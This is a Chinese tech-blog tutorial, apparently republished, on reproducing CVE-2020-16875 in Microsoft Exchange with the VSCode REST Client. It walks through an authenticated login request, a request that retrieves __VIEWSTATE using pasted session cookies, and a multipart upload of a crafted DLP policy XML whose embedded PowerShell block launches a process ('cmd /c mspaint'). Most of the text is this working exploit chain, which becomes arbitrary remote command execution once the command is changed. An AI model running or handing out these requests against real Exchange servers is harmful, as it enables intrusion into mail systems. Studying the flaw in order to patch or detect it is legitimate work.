这篇文章主要介绍“怎么使用vscode rest client分析CVE-2020-16875漏洞”,在日常操作中,相信很多人在怎么使用vscode rest client分析CVE-2020-16875漏洞问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”怎么使用vscode rest client分析CVE-2020-16875漏洞”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
定义几个变量
@target=target @username=info2002 @password=123456abc
第一步, 登录验证,主要是获取用户的授权cookie,
## 触发RCE 的一个前提,是需要有一个可以登录的账号密码。 ## 登录成功,返回一个 302 跳转,Location 地址为 https://{{target}}/owa ## 自己拷贝返回的cookie,留着下一步使用 POST https://{{target}}/owa/auth.owa Content-Type: application/x-www-form-urlencoded destination=https://{{target}}/owa&flags=&username={{username}}&password={{password}}&forcedownlevel=0&passwordText=&isUtf8=1
第二步,获取viewstate 信息
### 注意添加 cookie 信息,cookie 来自上一步的返回 ### POST 返回一个提交DLP策略的页面,其中包含一个 上传xml 页面的表单。 ### RCE 触发的关键,也是上传一个构建好的xml ### 搜索 __VIEWSTATE 表单,找到后边的value备用 POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly
第三步,触发RCE (不建议执行)
### 同理 cookie 信息,不能丢。 拿着第二步的 viewstate 信息构建恶意的xml,完成RCE. ### 不建议执行这一步 ,触发你能确保你的服务器的环境不受影响。 ### 基本上到第二步就已经可以确认会包含RCE 漏洞了。 POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$senderBtn" ResultPanePlaceHolder_ButtonsPanel_btnNext ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="__VIEWSTATE" /wEPDwUILTg5MDAzMDFkZKEgV4rq2832c5ZF38whYPpaizHg ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$name" anytexthere ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl"; filename="rce.xml" Content-Type: < ./rce.xml ------WebKitFormBoundary7MA4YWxkTrZu0gW--
贴上一个构造好的XML
<?xml version="1.0" encoding="UTF-8"?> <dlpPolicyTemplates> <dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0"> <contentVersion>4</contentVersion> <publisherName>si</publisherName> <name> <localizedString lang="en"></localizedString> </name> <description> <localizedString lang="en"></localizedString> </description> <keywords></keywords> <ruleParameters></ruleParameters> <policyCommands> <commandBlock> <![CDATA[ $i=New-object System.Diagnostics.ProcessStartInfo;$i.UseShellExecute=$true;$i.FileName="cmd";$i.Arguments="/c mspaint";$r=New-Object System.Diagnostics.Process;$r.StartInfo=$i;$r.Start() ]]> </commandBlock> </policyCommands> <policyCommandsResources></policyCommandsResources> </dlpPolicyTemplate> </dlpPolicyTemplates>
到此,关于“怎么使用vscode rest client分析CVE-2020-16875漏洞”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注亿速云网站,小编会继续努力为大家带来更多实用的文章!
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/222348.html